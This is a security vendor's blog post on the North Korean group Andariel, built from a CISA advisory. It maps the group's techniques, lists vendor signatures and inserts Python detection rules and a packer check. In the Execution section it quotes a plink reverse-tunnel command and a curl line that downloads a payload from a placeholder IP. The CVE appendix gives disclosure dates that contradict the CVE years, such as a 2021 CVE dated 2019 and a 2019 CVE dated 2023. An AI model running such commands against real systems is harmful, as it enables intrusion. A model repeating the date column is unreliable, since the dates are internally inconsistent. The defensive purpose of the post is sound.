
Andariel: North Korean APT Group Targets Military and Nuclear Programs

Written by Huseyin Can YUCEEL | Jul 26, 2024 4:02:30 PM

On July 25th, 2024, the Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on a state-sponsored North Korean APT group, Andariel [1]. Andariel, also known as Onyx Sleet, is associated with the 3rd Bureau of North Korea's Reconnaissance General Bureau (RGB). The group previously conducted destructive attacks but has since shifted towards specialized cyber espionage and ransomware operations.

In this blog post, we explain the tools and techniques used by Andariel and how organizations can defend themselves against this North Korean APT group.

Andariel: The North Korean State-Sponsored APT Group

Andariel, also known as Onyx Sleet, is an Advanced Persistent Threat (APT) that has been associated with North Korea's Reconnaissance General Bureau (RGB) based in Pyongyang and Sinuiju. Andariel has been active since 2013, and the group gained infamy with the Sony Pictures hack in 2014. 

Andariel's motivations are aligned with the North Korean political agenda, and the APT group primarily targets defense, aerospace, nuclear, and engineering organizations for cyber espionage. Additionally, the group runs ransomware operations against healthcare organizations in the US to fund its operations.

The North Korean APT group utilizes a range of tactics, including spear phishing and vulnerability exploitation against web servers to infiltrate targeted organizations. After the initial foothold, they use known system discovery and enumeration techniques and establish persistence by deploying webshells and scheduled tasks. Adversaries also utilize custom malware, remote access tools (RATs), and open-source tools for lateral movement and data exfiltration.  

Tactics, Techniques, and Procedures (TTPs) used by Andariel

Initial Access

T1190 - Exploit Public-Facing Application

Andariel uses known and critical vulnerabilities to gain initial access to target networks. Although these vulnerabilities were disclosed with respective patches a long time ago, the unpatched assets still pose significant risks to organizations. The list of exploited vulnerabilities can be seen in the Appendix.

Execution

T1059 - Command and Scripting Interpreter

Adversaries abuse native tools and processes such as the Windows command line, PowerShell, and WMI on compromised systems to execute their malicious actions without raising suspicion. This technique is also called Living-off-the-Land. Some example commands observed in Andariel intrusions are given below.

netstat -naop
netstat -noa

systeminfo | findstr Logon

pvhost.exe -N -R [IP Address]:[Port] -P [Port] -l [username] -pw [password] <Remote_IP>

curl hxxp[://][IP Address]/tmp/tmp/comp[.]dat -o c:\users\public\notify[.]exe
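One way to turn the command shapes above into detection logic, as an added example that is not from the original post or the CISA advisory: the rules below run over constructed process-creation events (hypothetical host names and documentation-range addresses) and additionally flag hosts on which more than one pattern fires, since a single netstat or curl invocation on its own is often legitimate administration.

```python
import re

# Constructed process-creation events in a Sysmon Event ID 1 style; not real telemetry.
# The first four mirror the command shapes listed above; the last one is benign noise.
SAMPLE_EVENTS = [
    {"host": "ws01", "cmdline": "netstat -naop"},
    {"host": "ws01", "cmdline": 'cmd.exe /c "systeminfo | findstr Logon"'},
    {"host": "srv02", "cmdline": "pvhost.exe -N -R 203.0.113.10:8080 -P 22 -l user -pw secret 203.0.113.10"},
    {"host": "srv02", "cmdline": "curl http://203.0.113.10/tmp/tmp/comp.dat -o c:\\users\\public\\notify.exe"},
    {"host": "ws03", "cmdline": "netstat -an"},
]

# Hypothetical rule names; each regex is evaluated against the command line only.
RULES = [
    # netstat with owning-PID style flag combinations (-naop / -noa) used for connection discovery
    ("netstat_owning_pid", re.compile(r"\bnetstat\b\s+-[naop]{3,}\b", re.I)),
    # systeminfo output filtered for logon-related lines
    ("systeminfo_findstr_logon", re.compile(r"\bsysteminfo\b.*\|\s*findstr\b.*\bLogon\b", re.I)),
    # plink-style reverse tunnel (-R host:port) combined with an inline password (-pw)
    ("reverse_tunnel_inline_pw", re.compile(r"\s-R\s+\S+:\d+\b.*\s-pw\s+\S+", re.I)),
    # curl writing an executable into the world-writable C:\Users\Public directory
    ("curl_drop_to_public", re.compile(r"\bcurl\b.*\s-o\s+\S*\\users\\public\\\S+\.exe\b", re.I)),
]


def evaluate(events):
    """Return (host, rule_name, cmdline) for every event that matches a rule."""
    hits = []
    for ev in events:
        for name, pattern in RULES:
            if pattern.search(ev["cmdline"]):
                hits.append((ev["host"], name, ev["cmdline"]))
    return hits


def hosts_with_chained_activity(hits, min_rules=2):
    """Hosts on which at least `min_rules` distinct rules fired; a stronger signal than
    any single living-off-the-land command, which may be ordinary admin activity."""
    seen = {}
    for host, name, _ in hits:
        seen.setdefault(host, set()).add(name)
    return sorted(h for h, names in seen.items() if len(names) >= min_rules)


if __name__ == "__main__":
    found = evaluate(SAMPLE_EVENTS)
    for host, name, cmd in found:
        print(f"{host}: {name}: {cmd}")
    print("hosts with chained activity:", hosts_with_chained_activity(found))
```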

Defense Evasion

T1027 Obfuscated Files or Information

The North Korean threat actors use VMProtect and Themida to pack their malicious tools. The resulting files often have file section names such as vmp0 and vmp1. This obfuscation technique makes detection and debugging harder for security teams.
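An added example (not code from the post, the advisory, or Picus) that checks a PE file for the VMProtect section names mentioned above using only the standard library: a minimal parser for the DOS, PE and COFF headers that walks the section table, a constructed header-only PE image used as a test fixture, and a check against vmp0/vmp1 (the dotted spellings .vmp0/.vmp1 are included because other VMProtect builds use them).

```python
import struct

# Section names associated with VMProtect-packed binaries. vmp0/vmp1 are the names given above;
# the dotted forms are the other spelling commonly produced by VMProtect.
PACKER_SECTION_NAMES = {"vmp0", "vmp1", ".vmp0", ".vmp1"}


def pe_section_names(data):
    """Parse the DOS, PE and COFF headers and return the section names in table order."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)          # offset of the PE signature
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                          # IMAGE_FILE_HEADER starts here
    (num_sections,) = struct.unpack_from("<H", data, coff + 2)   # NumberOfSections
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)      # SizeOfOptionalHeader
    table = coff + 20 + opt_size                                 # first IMAGE_SECTION_HEADER
    names = []
    for i in range(num_sections):
        raw = data[table + 40 * i: table + 40 * i + 8]           # Name[8], NUL-padded
        if len(raw) < 8:
            raise ValueError("truncated section table")
        names.append(raw.rstrip(b"\x00").decode("ascii", "replace"))
    return names


def packer_indicators(data):
    """Return the section names that match the VMProtect naming pattern (empty if none)."""
    return [n for n in pe_section_names(data) if n.lower() in PACKER_SECTION_NAMES]


def build_fake_pe(section_names):
    """Construct a header-only PE image (a test fixture, not malware) with the given sections."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)   # exactly 0x40 bytes
    # Machine=x64, NumberOfSections, timestamp, symtab ptr, symbol count, SizeOfOptionalHeader=0, flags
    coff = struct.pack("<HHIIIHH", 0x8664, len(section_names), 0, 0, 0, 0, 0x22)
    sections = b"".join(n.encode().ljust(8, b"\x00") + b"\x00" * 32 for n in section_names)
    return dos + b"PE\x00\x00" + coff + sections


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            print(path, packer_indicators(f.read()))
```

Section names are only one hint: a packer can rename them, so treat a hit as a triage signal to be confirmed with entropy or import-table checks rather than a verdict.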

Credential Access

T1003 Credential Dumping

Andariel uses publicly available tools such as Mimikatz, ProcDump, and Dumpert to access the Active Directory domain database by targeting NTDS.dit files. After dumping credentials, adversaries crack them offline and obtain clear-text passwords for valid accounts.

Discovery

T1087 Account Discovery

Adversaries use a command-line tool called AdFind to gather information from the Active Directory. This tool allows threat actors to get a list of valid accounts, usernames, and email addresses within the compromised network.

T1083 File and Directory Discovery

The threat actors use a custom .NET tool to enumerate files and directories in the compromised hosts. The tool collects information such as starting path, name, last write time, last access time, creation time, size, and attributes from each drive targeted on the host.

Lateral Movement

T1021 Remote Services

Adversaries use remote services such as Telnet, SSH, VNC, RDP, and SMB to interact with remote systems. Additionally, compromised valid accounts allow them to move laterally within the compromised network.

Command and Control 

T1071 Application Layer Protocol

Adversaries use the HTTP protocol to blend their C2 activity with the usual network traffic. This technique allows them to appear as benign traffic and evade detection by security controls.

T1090 Proxy & T1572 Protocol Tunneling

Andariel uses tools like 3Proxy, PLINK, and Stunnel to tunnel their traffic over various protocols from compromised hosts to C2 servers. 

Exfiltration

T1567 Exfiltration Over Web Service

Instead of directly communicating with their C2 servers, threat actors use web services and cloud storage services to exfiltrate data from compromised networks.

T1048 Exfiltration Over Alternative Protocol

Andariel uses PuTTY and WinSCP to exfiltrate data to their servers via File Transfer Protocol (FTP).

How Does Picus Help Simulate Andariel Attacks?

We also strongly suggest simulating Andariel attacks to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other state-sponsored threat actors, such as APT40, Lazarus, and Volt Typhoon, within minutes with a 14-day free trial of the Picus Platform.

The Picus Threat Library includes the following threats for Andariel, aka Onyx Sleet:

| Threat ID | Threat Name | Attack Module |
| --- | --- | --- |
| 38883 | Andariel Threat Group Campaign 2023 | Windows Endpoint |
| 56407 | Andariel Threat Group Campaign Backdoor Malware Download Threat | Network Infiltration |
| 41382 | Andariel Threat Group Campaign Backdoor Malware Email Threat | Email Infiltration (Phishing) |
| 76699 | Andariel Threat Group Campaign Malware Downloader Download Threat | Network Infiltration |
| 88521 | Andariel Threat Group Campaign Ransomware Download Threat | Network Infiltration |
| 38855 | Andariel Threat Group Campaign Ransomware Email Threat | Email Infiltration (Phishing) |
| 93568 | Andariel Threat Group Campaign Malware Downloader Email Threat | Email Infiltration (Phishing) |
| 37270 | Andariel Threat Group Campaign RAT Download Threat | Network Infiltration |
| 30592 | Andariel Threat Group Campaign RAT Email Threat | Email Infiltration (Phishing) |
| 76162 | Lilith RAT Download Threat | Network Infiltration |
| 36694 | Lilith RAT Email Threat | Email Infiltration (Phishing) |
| 47956 | Yamabot RAT Download Threat | Network Infiltration |
| 23158 | Yamabot RAT Email Threat | Email Infiltration (Phishing) |
| 33583 | Atharvan Backdoor Malware Download Threat | Network Infiltration |
| 24167 | Atharvan Backdoor Malware Email Threat | Email Infiltration (Phishing) |
| 38967 | TigerRAT RAT Download Threat | Network Infiltration |
| 77704 | TigerRAT RAT Email Threat | Email Infiltration (Phishing) |

Picus also provides actionable mitigation content. The Picus Mitigation Library includes prevention signatures for preventive security controls that address the malware and vulnerabilities exploited by the Andariel (Onyx Sleet) group. Currently, Picus Labs has validated the following signatures for the Andariel APT group:

| Security Control | Signature ID | Signature Name |
| --- | --- | --- |
| CheckPoint | 0DA0DE0F0 | TS_APT.Win32.Lazarus.TC.2b7bkEkG |
| CheckPoint | 0C6CB1FF8 | Trojan.Win32.Ransomware.Win32.Custom.TC.4999V |
| CheckPoint | 09A3A83C9 | Backdoor.Win32.Andariel.TC.f79eWHdC |
| CheckPoint | 0AE871AFF | Backdoor.Win32.Andariel.TC.f7f0Gdlj |
| CheckPoint | 08974D9A1 | TS_APT.Win32.Lazarus.TC.739efHbg |
| CheckPoint | 0FCD3CDFF | Trojan.Win32.Generic.Win32.Generic.TC.f14dLxvv |
| CheckPoint | 0F54522EE | Trojan.Win32.Generic.TC.89abRAvr |
| CheckPoint | 0896BA266 | Trojan.Win32.Imphash.TC.146bNnUc |
| CheckPoint | 0D53F5CE5 | Ransomware.Win32.HelloKitty.TC.2febTLgq |
| CheckPoint | 0DDEDEB11 | HEUR:Trojan.Win32.Mikey.TC.3c83rvQA |
| CheckPoint | 09A75653F | HEUR:Trojan.Win32.Mikey.TC.62aeGoGy |
| CheckPoint | 09378C88A | Trojan.Win32.Imphash.TC.1bd6Kdgd |
| CheckPoint | 0B17077B7 | Backdoor.Win32.TigerRat.TC.3ac2gJvN |
| Cisco FirePower | | W32.79E15CC02C-95.SBX.TG |
| Cisco FirePower | | W32.5C2F339362.in12.Talos |
| Cisco FirePower | | W32.Auto:1177105e51.in03.Talos |
| Cisco FirePower | | W32.Auto:b59e8f4482.in03.Talos |
| Cisco FirePower | | GenericKD:TROJ_GEN-tpd |
| Cisco FirePower | | TROJ_GEN:TrojanX-tpd |
| Cisco FirePower | | W32.Auto:8daa6b.in03.Talos |
| Cisco FirePower | | W32.Auto:3098e6.in03.Talos |
| Cisco FirePower | | W32.Auto:ce534eb8de.in03.Talos |
| Cisco FirePower | | W32.Auto:c3c0cf.in03.Talos |
| Cisco FirePower | | W32.Auto:8b3c8046fa.in03.Talos |
| Cisco FirePower | | W32.FEC82F2542.in12.Talos |
| Cisco FirePower | | W32.Auto:4aadf76749.in03.Talos |
| Cisco FirePower | | W32.868A62FEFF-100.SBX.VIOC |
| Cisco FirePower | | W32.C2500A6E12.in12.Talos |
| Cisco FirePower | | W32.9F90670D21.in12.Talos |
| ForcePoint NGFW | | File_Malware-Blocked |
| ForcePoint NGFW | | File-OLE_Malicious-Looking-Document |
| Fortigate AV | 62183 | PossibleThreat |
| Fortigate AV | 6945573 | Adware/HiddenInstall |
| Fortigate AV | 8173658 | PossibleThreat.MU |
| Fortigate AV | 10021613 | W64/NukeSped.HD!tr |
| Fortigate AV | 10125033 | MSIL/Agent_AGen.AOS!tr |
| Fortigate AV | 10003277 | VBA/Agent.UOE!tr |
| Fortigate AV | 8187637 | W32/AI.Pallas.Suspicious |
| Fortigate AV | 10036457 | W32/Filecoder.OHM!tr |
| Palo Alto | 459572261 | trojan/Win32 EXE.xnet.ae |
| Palo Alto | 413328855 | trojan/Win32 EXE.malware.axun |
| Palo Alto | 618815202 | trojan/Win32.tigerrat.c |
| Palo Alto | 602811585 | trojan/Win32.susgen.apt |
| Palo Alto | 459168833 | trojan/Win32 EXE.xnet.ad |
| Palo Alto | 459572168 | trojan/Win32.nukesped.l |
| Palo Alto | 413338881 | trojan/Win32 EXE.artemis.aixp |
| Palo Alto | 615485823 | trojan/Win32.heur2.en |
| Palo Alto | 413245182 | trojan/MS WORD.valyria.ono |
| Palo Alto | 408136170 | trojan/Win32 EXE.siggen.aat |
| Palo Alto | 459168818 | Program/Win32.multiverze.a |
| Palo Alto | 408041781 | trojan/Win32 EXE.siggen.xl |
| Palo Alto | 413246292 | trojan/Win32 EXE.hiddeninstall.dq |
| Palo Alto | 601781334 | trojan/Win32.andardoor.b |
| Palo Alto | 580706583 | Trojan/Win32.tiggre.vcj |
| Snort | 3.13469.13 | FILE-OFFICE Microsoft Word ole stream memory corruption attempt |
| Snort | 1.2019837.2 | ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide) |
| Trellix | 0x4840c900 | MALWARE: Malicious File Detected by GTI |

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

References

[1] "North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime's Military and Nuclear Programs," Cybersecurity and Infrastructure Security Agency CISA. [Online]. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a

Appendix

The list below shows known and critical vulnerabilities exploited by Andariel. Using the Picus Security Validation Platform, you can validate your security controls against Andariel's vulnerability exploitation attacks. 

| Product | Vulnerability | CVSS Score | Disclosure Date |
| --- | --- | --- | --- |
| Apache ActiveMQ | CVE-2023-46604 | 9.8 (Critical) | 15 May 2023 |
| JetBrains TeamCity | CVE-2023-42793 | 9.8 (Critical) | 26 May 2023 |
| Citrix NetScaler | CVE-2023-3519 | 9.8 (Critical) | 24 May 2023 |
| Ivanti Endpoint Manager Mobile (EPMM) | CVE-2023-35078 | 9.8 (Critical) | 24 May 2023 |
| Progress MOVEit Transfer | CVE-2023-34362 | 9.8 (Critical) | 24 May 2023 |
| Apache RocketMQ | CVE-2023-33246 | 9.8 (Critical) | 24 May 2023 |
| KeePass | CVE-2023-32784 | 7.5 (High) | 13 Jun 2023 |
| Openfire | CVE-2023-32315 | 7.5 (High) | 7 Mar 2023 |
| Google Chromium V8 Type Confusion | CVE-2023-3079 | 9.8 (Critical) | 18 Apr 2023 |
| Zyxel ZyWALL/USG series firmware | CVE-2023-28771 | 9.8 (Critical) | 6 Feb 2023 |
| Zyxel ATP series firmware | CVE-2023-33010 | 9.8 (Critical) | 18 Jan 2023 |
| Barracuda Email Security Gateway | CVE-2023-2868 | 9.8 (Critical) | 25 Sep 2022 |
| FortiGate SSL VPN | CVE-2023-27997 | 9.8 (Critical) | 20 Apr 2022 |
| Apache HTTP Server | CVE-2023-25690 | 9.8 (Critical) | 1 Jun 2022 |
| Oracle Hospitality Opera 5 | CVE-2023-21932 | 7.2 (High) | 25 Feb 2022 |
| GoAnywhere MFT | CVE-2023-0669 | 7.2 (High) | 7 Feb 2023 |
| Zoho ManageEngine | CVE-2022-47966 | 9.8 (Critical) | 25 Apr 2022 |
| Zimbra Collaboration Suite | CVE-2022-41352 | 9.8 (Critical) | 4 Apr 2022 |
| Zimbra Collaboration Suite | CVE-2022-27925 | 7.2 (High) | 16 Feb 2022 |
| Microsoft Windows Support Diagnostic Tool | CVE-2022-30190 | 7.8 (High) | 16 Feb 2022 |
| TP-LINK TL-WR840N | CVE-2022-25064 | 9.8 (Critical) | 16 Feb 2022 |
| TerraMaster NAS | CVE-2022-24990 | 7.5 (High) | 1 Apr 2022 |
| TerraMaster NAS | CVE-2021-45837 | 9.8 (Critical) | 3 Mar 2022 |
| Moment.js library | CVE-2022-24785 | 7.5 (High) | 9 Feb 2022 |
| PHP Everywhere | CVE-2022-24665 | 8.8 (High) | 11 Jan 2022 |
| PHP Everywhere | CVE-2022-24664 | 8.8 (High) | 21 Feb 2022 |
| PHP Everywhere | CVE-2022-24663 | 8.8 (High) | 21 Feb 2022 |
| Spring MVC and WebFlux | CVE-2022-22965 | 9.8 (Critical) | 15 Dec 2021 |
| Spring Cloud Gateway | CVE-2022-22947 | 10.0 (Critical) | 15 Dec 2021 |
| Microsoft SharePoint Server | CVE-2022-22005 | 8.8 (High) | 15 Sep 2021 |
| Win32k Elevation of Privilege | CVE-2022-21882 | 7.8 (High) | 5 Oct 2021 |
| Apache Log4j | CVE-2021-44228 | 8.8 (High) | 22 Sep 2021 |
| Samba vfs_fruit module | CVE-2021-44142 | 8.8 (High) | 5 Jan 2021 |
| Windows Common Log File System Driver | CVE-2021-43226 | 7.8 (High) | 8 Dec 2021 |
| Windows Common Log File System Driver | CVE-2021-43207 | 7.8 (High) | 4 Aug 2021 |
| Windows Common Log File System Driver | CVE-2021-36955 | 7.8 (High) | 26 Aug 2019 |
| Apache HTTP Server 2.4.49 | CVE-2021-41773 | 7.5 (High) | 25 Mar 2019 |
| Talend ESB Runtime | CVE-2021-40684 | 9.1 (Critical) | 16 May 2019 |
| IPeakCMS 3.5 | CVE-2021-3018 | 9.8 (Critical) | 5 Jan 2018 |
| SMA100 Apache httpd server (SonicWall) | CVE-2021-20038 | 9.8 (Critical) | 15 May 2023 |
| SonicWall Secure Remote Access (SRA) | CVE-2021-20028 | 9.8 (Critical) | 26 May 2023 |
| Tableau Server, Desktop, and Public Desktop | CVE-2019-15637 | 8.1 (High) | 24 May 2023 |
| Kibana | CVE-2019-7609 | 10.0 (Critical) | 24 May 2023 |
| Microsoft Remote Desktop Services | CVE-2019-0708 | 9.8 (Critical) | 24 May 2023 |
| VMware V4H and V4PA | CVE-2017-4946 | 7.8 (High) | 24 May 2023 |